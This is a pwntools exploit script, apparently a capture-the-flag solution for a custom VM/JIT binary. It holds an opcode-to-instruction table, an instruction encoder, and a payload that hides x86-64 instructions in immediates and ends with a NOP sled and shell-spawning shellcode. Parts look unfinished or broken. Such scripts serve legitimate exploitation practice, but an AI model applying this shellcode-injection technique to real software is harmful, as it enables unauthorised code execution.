# hack gsp(0, 0, 2, 2, 0x1111) 0: 66 89 c9 mov cx, cx
# hack gsp(0, 0, 2, 3, 0x1111) 0: 66 89 d1 mov cx, dx
# hack gsp(0, 0, 3, 0, 0x1111) 0: 66 89 c2 mov dx, ax
# hack gsp(0, 0, 3, 1, 0x1111) 0: 66 89 da mov dx, bx
# hack gsp(0, 0, 3, 2, 0x1111) 0: 66 89 ca mov dx, cx
# hack gsp(0, 0, 3, 3, 0x1111) 0: 66 89 d2 mov dx, dx
### 1
# hack gsp(1, 1, 0, 0, 0x1111) 0: 66 11 c0 adc ax, ax
# hack gsp(1, 1, 0, 1, 0x1111) 0: 66 11 d8 adc ax, bx
# hack gsp(1, 1, 0, 2, 0x1111) 0: 66 11 c8 adc ax, cx
# hack gsp(1, 1, 0, 3, 0x1111) 0: 66 11 d0 adc ax, dx
# hack gsp(1, 1, 1, 0, 0x1111) 0: 66 11 c3 adc bx, ax
# hack gsp(1, 1, 1, 1, 0x1111) 0: 66 11 db adc bx, bx
# hack gsp(1, 1, 1, 2, 0x1111) 0: 66 11 cb adc bx, cx
# hack gsp(1, 1, 1, 3, 0x1111) 0: 66 11 d3 adc bx, dx
# hack gsp(1, 1, 2, 0, 0x1111) 0: 66 11 c1 adc cx, ax
# hack gsp(1, 1, 2, 1, 0x1111) 0: 66 11 d9 adc cx, bx
# hack gsp(1, 1, 2, 2, 0x1111) 0: 66 11 c9 adc cx, cx
# hack gsp(1, 1, 2, 3, 0x1111) 0: 66 11 d1 adc cx, dx
# hack gsp(1, 1, 3, 0, 0x1111) 0: 66 11 c2 adc dx, ax
# hack gsp(1, 1, 3, 1, 0x1111) 0: 66 11 da adc dx, bx
# hack gsp(1, 1, 3, 2, 0x1111) 0: 66 11 ca adc dx, cx
# hack gsp(1, 1, 3, 3, 0x1111) 0: 66 11 d2 adc dx, dx
# hack gsp(1, 0, 0, 0, 0x1111) 0: 66 01 c0 add ax, ax
# hack gsp(1, 0, 0, 1, 0x1111) 0: 66 01 d8 add ax, bx
# hack gsp(1, 0, 0, 2, 0x1111) 0: 66 01 c8 add ax, cx
# hack gsp(1, 0, 0, 3, 0x1111) 0: 66 01 d0 add ax, dx
# hack gsp(1, 0, 1, 0, 0x1111) 0: 66 01 c3 add bx, ax
# hack gsp(1, 0, 1, 1, 0x1111) 0: 66 01 db add bx, bx
# hack gsp(1, 0, 1, 2, 0x1111) 0: 66 01 cb add bx, cx
# hack gsp(1, 0, 1, 3, 0x1111) 0: 66 01 d3 add bx, dx
# hack gsp(1, 0, 2, 0, 0x1111) 0: 66 01 c1 add cx, ax
# hack gsp(1, 0, 2, 1, 0x1111) 0: 66 01 d9 add cx, bx
# hack gsp(1, 0, 2, 2, 0x1111) 0: 66 01 c9 add cx, cx
# hack gsp(1, 0, 2, 3, 0x1111) 0: 66 01 d1 add cx, dx
# hack gsp(1, 0, 3, 0, 0x1111) 0: 66 01 c2 add dx, ax
# hack gsp(1, 0, 3, 1, 0x1111) 0: 66 01 da add dx, bx
# hack gsp(1, 0, 3, 2, 0x1111) 0: 66 01 ca add dx, cx
# hack gsp(1, 0, 3, 3, 0x1111) 0: 66 01 d2 add dx, dx
### 2
# hack gsp(2, 0, 0, 0, 0x1111) 0: 66 29 c0 sub ax, ax
# hack gsp(2, 0, 0, 1, 0x1111) 0: 66 29 d8 sub ax, bx
# hack gsp(2, 0, 0, 2, 0x1111) 0: 66 29 c8 sub ax, cx
# hack gsp(2, 0, 0, 3, 0x1111) 0: 66 29 d0 sub ax, dx
# hack gsp(2, 0, 1, 0, 0x1111) 0: 66 29 c3 sub bx, ax
# hack gsp(2, 0, 1, 1, 0x1111) 0: 66 29 db sub bx, bx
# hack gsp(2, 0, 1, 2, 0x1111) 0: 66 29 cb sub bx, cx
# hack gsp(2, 0, 1, 3, 0x1111) 0: 66 29 d3 sub bx, dx
# hack gsp(2, 0, 2, 0, 0x1111) 0: 66 29 c1 sub cx, ax
# hack gsp(2, 0, 2, 1, 0x1111) 0: 66 29 d9 sub cx, bx
# hack gsp(2, 0, 2, 2, 0x1111) 0: 66 29 c9 sub cx, cx
# hack gsp(2, 0, 2, 3, 0x1111) 0: 66 29 d1 sub cx, dx
# hack gsp(2, 0, 3, 0, 0x1111) 0: 66 29 c2 sub dx, ax
# hack gsp(2, 0, 3, 1, 0x1111) 0: 66 29 da sub dx, bx
# hack gsp(2, 0, 3, 2, 0x1111) 0: 66 29 ca sub dx, cx
# hack gsp(2, 0, 3, 3, 0x1111) 0: 66 29 d2 sub dx, dx
# hack gsp(2, 1, 0, 0, 0x1111) 0: 66 19 c0 sbb ax, ax
# hack gsp(2, 1, 0, 1, 0x1111) 0: 66 19 d8 sbb ax, bx
# hack gsp(2, 1, 0, 2, 0x1111) 0: 66 19 c8 sbb ax, cx
# hack gsp(2, 1, 0, 3, 0x1111) 0: 66 19 d0 sbb ax, dx
# hack gsp(2, 1, 1, 0, 0x1111) 0: 66 19 c3 sbb bx, ax
# hack gsp(2, 1, 1, 1, 0x1111) 0: 66 19 db sbb bx, bx
# hack gsp(2, 1, 1, 2, 0x1111) 0: 66 19 cb sbb bx, cx
# hack gsp(2, 1, 1, 3, 0x1111) 0: 66 19 d3 sbb bx, dx
# hack gsp(2, 1, 2, 0, 0x1111) 0: 66 19 c1 sbb cx, ax
# hack gsp(2, 1, 2, 1, 0x1111) 0: 66 19 d9 sbb cx, bx
# hack gsp(2, 1, 2, 2, 0x1111) 0: 66 19 c9 sbb cx, cx
# hack gsp(2, 1, 2, 3, 0x1111) 0: 66 19 d1 sbb cx, dx
# hack gsp(2, 1, 3, 0, 0x1111) 0: 66 19 c2 sbb dx, ax
# hack gsp(2, 1, 3, 1, 0x1111) 0: 66 19 da sbb dx, bx
# hack gsp(2, 1, 3, 2, 0x1111) 0: 66 19 ca sbb dx, cx
# hack gsp(2, 1, 3, 3, 0x1111) 0: 66 19 d2 sbb dx, dx
### 4
# hack gsp(4, 1, 0, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 0, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 0, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 0, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 1, 1, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 1, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 1, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 1, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 1, 2, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 2, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 2, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 2, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 1, 3, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 3, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 3, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 3, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 2, 0, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 0, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 0, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 0, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 2, 1, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 1, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 1, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 1, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 2, 2, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 2, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 2, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 2, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 2, 3, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 3, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 3, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 3, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 4, 0, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 0, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 0, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 0, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 4, 1, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 1, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 1, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 1, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 4, 2, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 2, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 2, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 2, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 4, 3, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 3, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 3, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 3, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 0, 0, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 0, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 0, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 0, 3, 0x1111) 0: 66 f7 d2 not dx
# hack gsp(4, 0, 1, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 1, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 1, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 1, 3, 0x1111) 0: 66 f7 d2 not dx
# hack gsp(4, 0, 2, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 2, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 2, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 2, 3, 0x1111) 0: 66 f7 d2 not dx
# hack gsp(4, 0, 3, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 3, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 3, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 3, 3, 0x1111) 0: 66 f7 d2 not dx
io = start([])
def gsp(opcode, cmd1=0, o1=0, o2=0, data=0xbeef):
op = 0
# 0xF
op += cmd1 + (opcode<<4)
op += (o2 + (o1<<4) << 8)
op += (data) << 0x10
return p32(op)
#gdb.attach(io,gdbscript=gdbscript+'brva 0x01CD5')
#pay = gsp(opcode, cmd1, o1, o2, 0x2)
pay = b''
#pay += gsp(0, 1, 0, 0, 0x1111)# 0: 66 b8 11 11 mov ax, 0x1111
#pay += gsp(0, 1, 0, 0, 0x1111)# 0: 66 b8 11 11 mov ax, 0x1111
#pay += gsp(4, 0, 0, 0, 0x1111)
#pay += gsp(6, 1, 12, 4, 0x1111)
#pay += gsp(5, 0, 0, 0, 0x3)# 0: 66 b8 11 11 mov ax, 0x1111i
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF # hlt pad
pay += gsp(0, 1, 0, 0, u16(asm('pop rax;pop rdi')))# 0: 66 b8 11 11 mov ax,
pay += gsp(0, 1, 1, 0, 0x15db)# 0: 66 bb 11 11 mov bx, 0x1111
pay += gsp(2, 0, 0, 1, 0)# 0: 66 29 d8 sub ax, bx
pay += gsp(0, 1, 3, 0, 0x7)# 0: 66 ba 11 11 mov dx, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('pop rdi;pop rdi')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('pop rdi;pop rdi')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16('fxbe'))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(0, 1, 0, 0, 0x9090)# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('call rax')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('push 0')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('push 0')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('pop rax;push rdi')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('pop rsi;pop rdi')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(0, 1, 3, 0, 0x500)# 0: 66 ba 11 11 mov dx, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('syscall')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(0, 1, 0, 0, 0x9090)# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(0, 1, 0, 0, 0x9090)# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(0, 1, 0, 0, 0x9090)# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(0, 1, 0, 0, 0x9090)# 0: 66 b8 11 11 mov ax, 0x1111
pay = b'x90' * 0x200
pay += asm(shellcraft.sh())
被C++ 击败了
